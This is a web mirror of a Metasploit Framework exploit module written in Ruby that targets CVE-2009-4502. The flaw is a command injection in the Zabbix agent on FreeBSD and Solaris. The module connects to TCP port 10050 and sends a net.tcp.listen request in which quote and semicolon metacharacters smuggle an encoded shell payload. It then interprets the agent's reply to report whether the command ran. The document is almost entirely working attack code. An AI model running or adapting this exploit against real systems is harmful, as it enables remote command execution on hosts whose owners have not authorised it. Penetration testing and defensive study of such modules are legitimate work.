CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/misc/zabbix_agent_exec.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Zabbix Agent net.tcp.listen Command Injection',

14
      'Description'    => %q{

15
          This module exploits a metacharacter injection vulnerability

16
        in the FreeBSD and Solaris versions of the Zabbix agent. This flaw

17
        can only be exploited if the attacker can hijack the IP address

18
        of an authorized server (as defined in the configuration file).

19
      },

20
      'Author'         => [ 'hdm' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'CVE', '2009-4502' ],

25
          [ 'OSVDB', '60956' ],

26
          [ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],

27
        ],

28
      'Platform'       => ['unix'],

29
      'Arch'           => ARCH_CMD,

30
      'Privileged'     => false,

31
      'Payload'        =>

32
        {

33
          'BadChars'    => "'",

34
          'Space'       => 1024,

35
          'DisableNops' => true,

36
          'Compat'      =>

37
            {

38
              'PayloadType' => 'cmd',

39
              'RequiredCmd' => 'generic perl telnet',

40
            }

41
        },

42
      'Targets'        =>

43
        [

44
          [ 'Automatic Target', { }]

45
        ],

46
      'DefaultTarget'  => 0,

47
      'DisclosureDate' => '2009-09-10'))

48


49
    register_options(

50
      [

51
        Opt::RPORT(10050)

52
      ])

53
  end

54


55
  def exploit

56
    connect

57


58
    rnd_port = rand(1024) + 1

59
    buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"

60


61
    print_status("Sending net.tcp.listen() request to the zabbix agent...")

62
    sock.put(buf)

63


64
    res = nil

65
    begin

66
      res = sock.get_once(-1, 5)

67
    rescue ::EOFError

68
    end

69


70
    if ! res

71
      print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.")

72
      disconnect

73
      return

74
    end

75


76
    if (res =~ /ZBX_NOTSUPPORTED/)

77
      print_status("The zabbix agent is not running a vulnerable version or operating system.")

78
      disconnect

79
      return

80
    end

81


82
    if(res !~ /ZBXD/)

83
      print_status("The zabbix agent returned an unknown response.")

84
      disconnect

85
      return

86
    end

87


88
    print_status("The zabbix agent should have executed our command.")

89
    disconnect

90
  end

91
end

92


93